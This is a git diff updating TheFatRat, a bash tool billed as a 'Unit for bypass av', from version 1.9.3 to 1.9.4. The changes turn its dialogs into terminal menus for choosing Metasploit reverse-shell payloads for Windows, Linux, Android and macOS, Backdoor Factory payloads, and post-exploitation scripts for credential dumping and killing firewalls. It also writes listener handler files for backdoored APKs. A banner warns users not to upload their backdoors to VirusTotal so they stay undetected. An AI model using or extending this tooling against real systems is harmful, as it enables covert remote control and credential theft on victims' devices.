diff --git a/CHANGELOG.md b/CHANGELOG.md index 1d40f73..805c46c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,4 +1,5 @@ ## CHANGELOG +* v1.9.4 - Fatrat will be full terminal mode , Powerstage tool added , Setup script rebuilded * v1.9.3 - Added update script * v1.9.3 - Dex2Jar will be installed from now on from Fatrat setup manually on user system (reason: Kali repo still uses old version) * v1.9.3 - Updated Android build tools to V.26 RC1 & Android Platform V. 25-R03 diff --git a/README.md b/README.md index 61d2465..cb90d2f 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # TheFatRat ( Unit for bypass av ) -## Update: Version 1.9.3 +## Update: Version 1.9.4 ## Codename: Whistle [![Version](https://img.shields.io/badge/TheFatRat-1.9.3-brightgreen.svg?maxAge=259200)]() @@ -138,7 +138,8 @@ Be sure to check out the [Changelog] and Read CHANGELOG.md - Dracos Linux from Scratch Indonesia ( Penetration os ) Thanksyou , you can see in http://dracos-linux.org/ - Offensive Security for the awesome OS ( http://www.offensive-security.com/ ) - peterpt -- Dana James Traversie https://github.com/dana-at-cp/backdoor-apk +- Dana James Traversie https://github.com/dana-at-cp/backdoor-apk +- z0noxz (Powerstager) https://github.com/z0noxz/powerstager - http://www.kali.org/" - Jack Wilder admin in http://www.linuxsec.org - source for c program https://github.com/rsmudge diff --git a/backdoor_apk b/backdoor_apk index 3f098f4..3210e77 100755 --- a/backdoor_apk +++ b/backdoor_apk @@ -618,10 +618,33 @@ echo "Your RAT apk was successfully builded and signed , it is located here : rm -rf temp/* > /dev/null 2>&1 echo "" fi -zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`" -if [ $? = 0 ] ; then -save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk"); -svf=$path/config/listeners/$save.rc +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne $cyan "Choose y/n : " +read sel +case $sel in +y|Y|Yes|yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : myratapk)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/myratapk.rc +rm -rf $svf >/dev/null 2>&1 +payloads=`sed -n 3p $apkconf` +yourip=`sed -n 4p $apkconf` +yourport=`sed -n 5p $apkconf` +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payloads" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $green "" +echo "Configuration file saved to $list/myratapk.rc" +else +svf=$path/config/listeners/$fname.rc rm -rf $svf >/dev/null 2>&1 payloads=`sed -n 3p $apkconf` yourip=`sed -n 4p $apkconf` @@ -632,5 +655,20 @@ echo "set LHOST $yourip" >> $svf echo "set LPORT $yourport" >> $svf echo "exploit -j" >> $svf echo -e $blue "" -echo "Configuration file saved to $list/$save.rc" +echo "Configuration file saved to $list/$fname.rc" fi +echo -e $green "" +read -rsp $'Press [ENTER] key to continue\n' -n 1 key +clear +;; +n|no|No|NO) +echo -e $green "" +read -rsp $'Press [ENTER] key to continue\n' -n 1 key +clear +;; +*) +echo -e $green "" +read -rsp $'Press [ENTER] key to continue\n' -n 1 key +clear +;; +esac diff --git a/fatrat b/fatrat index db4ccd9..a4ee177 100644 --- a/fatrat +++ b/fatrat @@ -46,7 +46,7 @@ fi #SAMARAN TAMPAN path=`pwd` -Versi=1.9.3 +Versi=1.9.4 codename=Whistle OS=`uname` # distro=$dist0 @@ -62,6 +62,7 @@ paycom='output/payload.c' pdfcom='output/pdf.c' bcom='output/Program.cs' pdfcom='output/pdf.c' +pstager='tools/power.py' apachecom='output/apache_com.c' out='output/ip.txt' pump='tools/pump.py' @@ -75,13 +76,14 @@ meterp="$path/temp/meterpreter.rc" outf="app_backdoor.apk" msploit=$path/logs/msploit.log lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'` +lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'` publicip=`dig +short myip.opendns.com @resolver1.opendns.com` hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'` list=$path/config/listeners log=$path/logs/apk-old.log pwind=$path/logs/pwind.log defcon=$path/config/conf.def - +logfud=$path/logs/fudwin.log # spinner for Metasploit Generator spinlong () { @@ -126,40 +128,66 @@ lp=`sed -n 2p $confd` echo "LHOST : $lh " echo "LPORT : $lp " echo "" -read -rsp $'Press any key go to options menu \n' -n 1 key -qt=$(zenity --list --radiolist --column "Select" --column "Action" TRUE "Change current config" FALSE "Delete configuration file" FALSE "Cancel" --text="Select one othe following options"); -case $qt in +read -rsp $'Press [ENTER] key go to options menu \n' -n 1 key +echo "" +echo -e $okegreen "Select one of the options bellow" +echo "" +echo -e $orange "+---------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Change current config$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Delete configuration file$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow Cancel$orange |" +echo -e $orange "+---------------------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read con +echo "" +case $con in -"Change current config") +1) +confd=$path/config/conf.def rm -rf $confd touch $confd clear -val=$(zenity --forms --title="Config Defaults" --text="Change config" \ - --add-entry="LHOST : " \ - --add-entry="LPORT : ") -echo $val > temp/temp.tmp -tr "|" "\n" $confd -rm temp/temp.tmp +echo "" +echo -e $okegreen "Write Lhost value$yellow (ex: 192.168.1.1 or mydomain.com)" +echo -ne $okegreen "LHOST : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val > $confd +fi +echo "" +echo -e $okegreen "Write Lport value$yellow (Must be a port between 1 & 65535)" +echo -ne "LPORT : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val >> $confd +fi echo -e $okegreen "" -read -rsp $'Configuration changed , Restart fatrat . Press any key to exit fatrat \n' -n 1 key +read -rsp $'Configuration created , restart fatrat , Press [ENTER] key to exit fatrat \n' -n 1 key clear exit 0 ;; -"Delete configuration file") +2) clear echo -e $okegreen "" rm -rf $confd echo "Default configuration file was deleted , you will now have to input Lhost & Lport values manually in fatrat options ." echo "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key clear menu ;; -"Cancel") +3) clear menu @@ -169,32 +197,56 @@ esac else echo -e $okegreen "" echo "No default configuration file detected " -read -rsp $'Press any key to go to options \n' -n 1 key -nc=$(zenity --list --radiolist --column "Select" --column "Action" TRUE "Create config" FALSE "Cancel" --text="Select one othe following options"); -case $nc in - -"Create config") +read -rsp $'Press [ENTER] key to go to options \n' -n 1 key +echo "" +clear +echo -e $okegreen "Select one of the options bellow" +echo "" +echo -e $orange "+---------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Create config$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Cancel$orange |" +echo -e $orange "+---------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read con +echo "" +case $con in +1) confd=$path/config/conf.def touch $confd -val=$(zenity --forms --title="Config Defaults" --text="Create config" \ - --add-entry="LHOST : " \ - --add-entry="LPORT : ") - -echo $val > temp/temp.tmp -tr "|" "\n" $confd -rm temp/temp.tmp -clear +echo "" +echo -e $okegreen "Write Lhost value$yellow (ex: 192.168.1.1 or mydomain.com)" +echo -ne $okegreen "LHOST : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val > $confd +fi +echo "" +echo -e $okegreen "Write Lport value$yellow (Must be a port between 1 & 65535)" +echo -ne "LPORT : ";tput sgr0 +read val +if [ -z $val ] +then +confdefault +else +echo $val >> $confd +fi echo -e $okegreen "" -read -rsp $'Configuration created , restart fatrat , Press any key to exit fatrat \n' -n 1 key +read -rsp $'Configuration created , restart fatrat , Press [ENTER] key to exit fatrat \n' -n 1 key clear exit 0 - ;; - -"Cancel") +2) clear menu - +;; +*) +echo -e $red "" +read -rsp $ "Invalid Option" +confdefault ;; esac fi @@ -228,6 +280,40 @@ fi echo -e $okegreen "" } +function selexe() { +echo "" + echo -e $okegreen "Enter the path to your EXE file .(ex: /root/downloads/myfile.exe)" + echo "" + echo -ne $cyan "Path : ";tput sgr0 + read exef +if [ ! -f $exef ] +then +echo "" +echo -e $red "File does not exist , make sure you write the right path of it ." +echo "" +echo -e $okegreen "Press [ENTER] key to try again ." +read cont +selexe +fi +} + +function selapk() { +echo "" + echo -e $okegreen "Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)" + echo "" + echo -ne $cyan "Path : ";tput sgr0 + read exef +if [ ! -f $exef ] +then +echo "" +echo -e $red "File does not exist , make sure you write the right path of it ." +echo "" +echo -e $okegreen "Press [ENTER] key to try again ." +read cont +selapk +fi +} + function invalid1 () { err=0 @@ -272,6 +358,7 @@ cat << ! | LHOST || The Listen Addres || $yourip | LPORT || The Listen Ports || $yourport | OUTPUTNAME || The Filename output || $fira + | PAYLOAD || Payload To Be Used || $payload +------------++-------------------------++-----------------------+ @@ -289,12 +376,345 @@ cat << ! | LHOST || The Listen Addres || $yourip | LPORT || The Listen Ports || $yourport | OUTPUTNAME || The Filename output || $outf + | PAYLOAD || Payload To Be Used || $payload +------------++-------------------------++-----------------------+ ! } +function crlst() { +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne $cyan "Choose y/n : " +read sel +case $sel in +y|Y|Yes|yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : myratapk)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/myratapk.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payload" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/myratapk.rc" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payload" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" +fi +echo -e $okegreen "" +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key +echo +clear +menu +;; +n|no|No|NO) +echo -e $okegreen "" +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key +echo +clear +menu +;; +*) +clear +menu +;; +esac +} + +function postexp() { +echo "" +echo -e $orange "+------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow sysinfo.rc$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow fast_migrate.rc$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow cred_dump.rc$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow gather.rc$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow auto_migrate+killfirewall.rc$orange |" +echo -e $orange "+------------------------------------+" +echo "" +echo -ne $okegreen "Choose Post Exploitation Module : ";tput sgr0 +read pemd +case $pemd in +1) +pe="$path/postexploit/sysinfo.rc" +;; +2) +pe="$path/postexploit/fast_migrate.rc" +;; +3) +pe="$path/postexploit/cred_dump.rc" +;; +4) +pe="$path/postexploit/gather.rc" +;; +5) +pe="$path/postexploit/auto_migrate+killfirewall.rc" +;; +*) +postexp +;; +esac +} + +function pldbkf() { +echo "" +echo -e $orange "+--------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow cave_miner_inline$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow iat_reverse_tcp_inline$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow iat_reverse_tcp_inline_threaded$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow iat_reverse_tcp_stager_threaded$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow iat_user_supplied_shellcode_threaded$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow meterpreter_reverse_https_threaded$orange |" +echo -e $orange "|$white [$okegreen 7$white ]$yellow reverse_shell_tcp_inline$orange |" +echo -e $orange "|$white [$okegreen 8$white ]$yellow reverse_tcp_stager_threaded$orange |" +echo -e $orange "|$white [$okegreen 9$white ]$yellow user_supplied_shellcode_threaded$orange |" +echo -e $orange "+--------------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="cave_miner_inline" +;; +2) +payload="iat_reverse_tcp_inline" +;; +3) +payload="iat_reverse_tcp_inline_threaded" +;; +4) +payload="iat_reverse_tcp_stager_threaded" +;; +5) +payload="iat_user_supplied_shellcode_threaded" +;; +6) +payload="meterpreter_reverse_https_threaded" +;; +7) +payload="reverse_shell_tcp_inline" +;; +8) +payload="reverse_tcp_stager_threaded" +;; +9) +payload="user_supplied_shellcode_threaded" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 9" +pldbkf +;; +esac +} + +function pldlnx () { +echo "" +echo -e $orange "+-----------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow linux/ppc/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow linux/x86/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow linux/x86/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow osx/armle/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow osx/ppc/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow bsd/x86/shell/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 7$white ]$yellow solaris/x86/shell_reverse_tcp$orange |" +echo -e $orange "+-----------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="linux/ppc/shell_reverse_tcp" +;; +2) +payload="linux/x86/shell_reverse_tcp" +;; +3) +payload="linux/x86/meterpreter/reverse_tcp" +;; +4) +payload="osx/armle/shell_reverse_tcp" +;; +5) +payload="osx/ppc/shell_reverse_tcp" +;; +6) +payload="bsd/x86/shell/reverse_tcp" +;; +7) +payload="solaris/x86/shell_reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 7" +pldlnx +;; +esac +} + +function pldwin () { +echo "" +echo -e $orange "+-------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow windows/shell_bind_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow windows/shell/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow windows/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow windows/meterpreter/reverse_tcp_dns$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow windows/meterpreter/reverse_http$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow windows/meterpreter/reverse_https$orange |" +echo -e $orange "+-------------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload :";tput sgr0 +read pld +case $pld in +1) +payload="windows/shell_bind_tcp" +;; +2) +payload="windows/shell/reverse_tcp" +;; +3) +payload="windows/meterpreter/reverse_tcp" +;; +4) +payload="windows/meterpreter/reverse_tcp_dns" +;; +5) +payload="windows/meterpreter/reverse_http" +;; +6) +payload="windows/meterpreter/reverse_https" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 6" +pldwin +;; +esac +} + +function pldand () { +echo "" +echo -e $orange "+-------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow android/meterpreter/reverse_http$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow android/meterpreter/reverse_https$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow android/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow android/shell/reverse_http$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow android/shell/reverse_https$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow android/shell/reverse_tcp$orange |" +echo -e $orange "+-------------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="android/meterpreter/reverse_http" +;; +2) +payload="android/meterpreter/reverse_https" +;; +3) +payload="android/meterpreter/reverse_tcp" +;; +4) +payload="android/shell/reverse_http" +;; +5) +payload="android/shell/reverse_https" +;; +6) +payload="android/shell/reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 6" +pldand +;; +esac +} + +function pldmac() { +echo "" +echo -e $orange "+--------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow python/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow generic/shell_reverse_tcp$orange |" +echo -e $orange "+--------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="python/meterpreter/reverse_tcp" +;; +2) +payload="generic/shell_reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 2" +pldmac +;; +esac +} + +function pldmul() { +echo "" +echo -e $orange "+-----------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow python/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow linux/x86/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 3$white ]$yellow linux/x86/meterpreter/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 4$white ]$yellow osx/armle/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 5$white ]$yellow osx/ppc/shell_reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 6$white ]$yellow bsd/x86/shell/reverse_tcp$orange |" +echo -e $orange "|$white [$okegreen 7$white ]$yellow solaris/x86/shell_reverse_tcp$orange |" +echo -e $orange "+-----------------------------------------+" +echo "" +echo -ne $okegreen "Choose Payload : ";tput sgr0 +read pld +case $pld in +1) +payload="python/meterpreter/reverse_tcp" +;; +2) +payload="linux/x86/shell_reverse_tcp" +;; +3) +payload="linux/x86/meterpreter/reverse_tcp" +;; +4) +payload="osx/armle/shell_reverse_tcp" +;; +5) +payload="osx/ppc/shell_reverse_tcp" +;; +6) +payload="bsd/x86/shell/reverse_tcp" +;; +7) +payload="solaris/x86/shell_reverse_tcp" +;; +*) +echo "" +echo -e $red "Wrong input , choose between 1 and 7" +pldand +;; +esac +} + #Microsploit log file msploitr () { @@ -332,7 +752,7 @@ aapt=`sed -n 11p $file` apktool=`sed -n 12p $file` keytool=`sed -n 7p $file` sign=`sed -n 5p $file` - +dx=`sed -n 10p $file` else echo -e $red"Configuration file does not exists , run setup.sh first for config ." exit 1 @@ -353,8 +773,8 @@ clear echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..." sleep 1 echo "" -Stop echo -e $red"[*] Stop all service , Wait ..." +Stop sleep 1 echo "" echo -e $yellow"[*] Thank You For Using TheFatRat =)." @@ -363,117 +783,106 @@ echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P." exit } - - -######################### -#CHECK DEPENDICIES -######################### -clear -echo -e $cyan" ____ _ _ _ " -echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " -echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | " -echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ " -echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)" -echo " |___/ " -echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia ' -echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' -echo -e " " - -if [ $(id -u) != "0" ]; then - - echo -e $red [!]::[Check Dependencies] ; - sleep 1 - echo -e $red [✔]::[Check User]: $USER ; - echo -e $red [✔]::[Distro]: $distro ; - echo -e $red [✔]::[Release]: $rlname ; - sleep 1 - echo -e $red [x]::[not root]: you need to be [root] to run this script.; - echo "" - sleep 1 - exit - - -else - - echo -e $okegreen [!]::[Check Dependencies]: ; - sleep 1 - echo -e $okegreen [✔]::[Distro]: $distro ; - echo -e $okegreen [✔]::[Release]: $rlname ; - echo -e $okegreen [✔]::[Check User]: $USER ; - - -fi - - ping -c 1 google.com > /dev/null 2>&1 - if [ "$?" != 0 ] - +function chknet() { +echo -e $red "[X] Your Internet is not working correctly!" +sleep 0.5 +echo -e $cyan "[*] Checking ...." +ping -c 1 8.8.4.4 > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] then - - echo -e $red [✔]::[Internet Connection]: OFFLINE!; - echo -e $red [x]::[warning]: This Script Needs An Active Internet Connection; - sleep 1 - -else - echo -e $okegreen [✔]::[Internet Connection]: connected!; - sleep 1 + echo -e $red "[X] Your linux OS is not able to resolve" + echo -e $red "hostnames over terminal using ping !!" + echo "" + echo -e $yellow "Search on the web : (unable to resolve hostnames ping) to find a solution" +echo "" +echo -e $okegreen "Fatrat will continue , but some of its functions may not work properly." +echo "" +echo -e $okegreen "Press [ENTER] key to continue" +read continue +cont + sleep 0.5 +elif [ $png == "1" ] +then + echo -e $yellow "You are connected to your local network but not to the web ." + echo -e $yellow "Check if your router/modem gateway is connected to the web ." +echo "" +echo -e $okegreen "Fatrat will continue , but some of its functions may not work properly." +echo "" +echo -e $okegreen "Press [ENTER] key to continue" +read continue +cont +sleep 0.5 +elif [ $png == "2" ] +then +echo -e $red "You are not connected to any network ." +echo "" +echo -e $okegreen "Fatrat will continue , but many of its functions will not work properly." +echo "" +echo -e $okegreen "Press [ENTER] key to continue" +read continue +cont + sleep 0.5 fi +} +cont() { # check apache if exists which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Apache2 Server $distro ]: installation found!; + echo -e $okegreen [✔]::[Apache2 Server $distro ]: Installation found!; else echo -e $red [x]::[warning]:this script require apache2 to work ; echo "" echo -e $red [!]::Run setup.sh to install apache2 ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if ruby exists which ruby > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Ruby]: installation found!; + echo -e $okegreen [✔]::[Ruby]: Installation found!; else echo -e $red [x]::[warning]:this script require ruby to work ; echo "" echo -e $red [!]::Run setup.sh to install ruby ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if apktool exists which $apktool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Apktool]: installation found!; + echo -e $okegreen [✔]::[Apktool]: Installation found!; else echo -e $red [x]::[warning]:this script require apktool to work ; echo "" echo -e $red[!]::Run setup.sh to install apktool ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if aapt exists which $aapt > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Aapt]: installation found!; + echo -e $okegreen [✔]::[Aapt]: Installation found!; else echo -e $red [x]::[warning]:this script require aapt to work ; echo "" echo -e $red [!]::Run setup.sh to install aapt ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 #another apache2 locate if [ "$distro" = "Ubuntu" ]; then @@ -485,75 +894,59 @@ sleep 2 else apache2="/var/www/html" fi - +sleep 0.5 # check msfconsole which $msfconsole > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Msfconsole]: installation found!; + echo -e $okegreen [✔]::[Msfconsole]: Installation found!; else echo -e $red [x]::[warning]:this script require msfconsole installed to work ; echo "" echo -e $red [!]::Run setup.sh to install metasploit-framework ; - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check if msfvenom exists which $msfvenom > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Msfvenom]: installation found!; + echo -e $okegreen [✔]::[Msfvenom]: Installation found!; else echo -e $red [x]::[warning]:this script require msfvenom installed to work ; echo "" echo -e $red [!]::Run setup.sh to install metasploit-framework ; - sleep 1 + sleep 0.5 exit 1 fi -sleep 1 - -# check zenity if exists - which zenity > /dev/null 2>&1 - if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Zenity]: installation found!; - -else - - echo -e $red [x]::[warning]:this script require zenity installed to work ; - echo "" - echo -e $red [!]::Run setup.sh to install zenity ; - echo "" - sleep 1 - exit 1 -fi -sleep 2 +sleep 0.5 # check mingw if exists which i586-mingw32msvc-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Mingw32 OR 64]: installation found!; + echo -e $okegreen [✔]::[Mingw32]: Installation found!; COMPILER="i586-mingw32msvc-gcc" else which i686-w64-mingw32-gcc > /dev/null 2>&1 if [ $? -eq 0 ]; then - echo -e $okegreen [✔]::[Mingw32]: installation found!; + echo -e $okegreen [✔]::[Mingw64]: Installation found!; COMPILER="i686-w64-mingw32-gcc" else echo -e $red [x]::[warning]:this script require mingw32 or 64 installed to work ; echo "" - echo -e $red [!]::Run setup.sh to install ming32 ; - sleep 1 + echo -e $red [!]::Run setup.sh to install mingw ; + sleep 0.5 exit 1 fi fi -sleep 2 +sleep 0.5 # check backdoor-factory if exists which $backdoor > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Backdoor-factory]: installation found!; + echo -e $okegreen [✔]::[Backdoor-factory]: Installation found!; else @@ -561,16 +954,16 @@ else echo "" echo -e $red [!]::Run setup.sh to install backdoor-factory ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check monodevelop if exists which monodevelop > /dev/null 2>&1 which dmcs > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Monodevelop]: installation found!; + echo -e $okegreen [✔]::[Monodevelop]: Installation found!; else @@ -578,15 +971,15 @@ else echo "" echo -e $red [!]::Run setup.sh to install monodevelop ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check xterm if exists which xterm > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Xterm]: installation found!; + echo -e $okegreen [✔]::[Xterm]: Installation found!; else @@ -594,14 +987,14 @@ else echo "" echo -e $red [!]::Run setup.sh to install xterm ; echo "" - sleep 1 + sleep 0.5 exit 1 fi - +sleep 0.5 # check gnome-terminal if exists which gnome-terminal > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Gnome-terminal]: installation found!; + echo -e $okegreen [✔]::[Gnome-terminal]: Installation found!; else @@ -609,14 +1002,14 @@ else echo "" echo -e $red [!]::Run setup.sh to install gnome-terminal ; echo "" - sleep 1 + sleep 0.5 exit 1 fi - +sleep 0.5 # check upx if exists which upx > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Upx]: installation found!; + echo -e $okegreen [✔]::[Upx]: Installation found!; else @@ -624,10 +1017,25 @@ else echo "" echo -e $red [!]::Run setup.sh to install upx ; echo "" - sleep 1 + sleep 0.5 exit 1 fi +sleep 0.5 +# check dex2jar if exists + which d2j-dex2jar > /dev/null 2>&1 + if [ -d $find ]; then + echo -e $okegreen [✔]::[Dex2jar]: Installation found!; +else + + echo -e $red [x]::[warning]:this script require Dex2jar to work ; + echo "" + echo -e $red [!]::Run setup.sh to install dex2jar ; + echo "" + sleep 0.5 + exit 1 +fi +sleep 2 #WARNING !!! resize -s 33 68 > /dev/null clear @@ -654,7 +1062,7 @@ echo " PLEASE DON'T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM " echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM " echo "==================================================================" echo "" -echo -n "Press any key to continue .............." +echo -n "Press [Enter] key to continue .............." read warning ############################## @@ -676,7 +1084,7 @@ then echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - sleep 1 + sleep 0.5 else resize -s 33 73 > /dev/null @@ -717,6 +1125,84 @@ else fi read -p "Press [Enter] key to Continue..." clear +} +######################### +#CHECK DEPENDICIES +######################### +clear +echo -e $cyan" ____ _ _ _ " +echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " +echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | " +echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ " +echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)" +echo " |___/ " +echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia ' +echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' +echo -e " " + +if [ $(id -u) != "0" ]; then + + echo -e $red [!]::[Check Dependencies] ; + sleep 0.5 + echo -e $red [✔]::[Check User]: $USER ; + echo -e $red [✔]::[Distro]: $distro ; + echo -e $red [✔]::[Release]: $rlname ; + sleep 0.5 + echo -e $red [x]::[not root]: you need to be [root] to run this script.; + echo "" + sleep 1 + exit + + +else + + echo -e $okegreen [!]::[Check Dependencies]: ; + sleep 0.5 + echo -e $okegreen [✔]::[Distro]: 